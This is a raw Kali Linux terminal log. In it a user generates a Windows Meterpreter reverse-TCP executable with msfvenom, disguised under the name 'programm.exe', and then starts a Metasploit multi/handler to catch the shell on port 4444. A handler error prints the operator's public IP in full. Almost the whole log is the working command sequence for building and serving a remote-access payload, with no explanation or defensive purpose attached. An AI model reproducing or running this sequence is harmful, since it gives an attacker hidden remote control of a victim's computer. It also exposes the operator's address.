root@kali:~# msfvenom -p windows/meterpreter/reverse_tcp LHOST=109.---.--.--- LPORT=4444 -f exe R > /root/programm.exe No platform was selected, choosing Msf::Module::Platform::Windows from the payload No Arch selected, selecting Arch: x86 from the payload No encoder or badchars specified, outputting raw payload Payload size: 333 bytes Final size of exe file: 73802 bytes root@kali:~# ls Desktop Documents Downloads programm.exe Music Pictures Public Templates Videos root@kali:~# pkill -9 ruby root@kali:~# msfconsole ______________________________________________________________________________ | | | 3Kom SuperHack II Logon | |______________________________________________________________________________| | | | | | | | User Name: [ security ] | | | | Password: [ ] | | | | | | | | [ OK ] | |______________________________________________________________________________| | | | https://metasploit.com | |______________________________________________________________________________| =[ metasploit v4.16.15-dev ] + -- --=[ 1699 exploits - 968 auxiliary - 299 post ] + -- --=[ 503 payloads - 40 encoders - 10 nops ] + -- --=[ Free Metasploit Pro trial: http://r-7.co/trymsp ] msf > use multi/handler/ msf exploit(handler) > set PAYLOAD windows/meterpreter/reverse_tcp PAYLOAD => windows/meterpreter/reverse_tcp msf exploit(handler) > set LHOST 109.---.--.--- LHOST => 109.---.--.--- msf exploit(handler) > set LPORT 4444 LPORT => 4444 msf exploit(handler) > exploit[*] Exploit running as background job 0. [-] Handler failed to bind to 109.252.62.124:4444:- -[*] Started reverse TCP handler on 0.0.0.0:4444 msf exploit(handler) > exit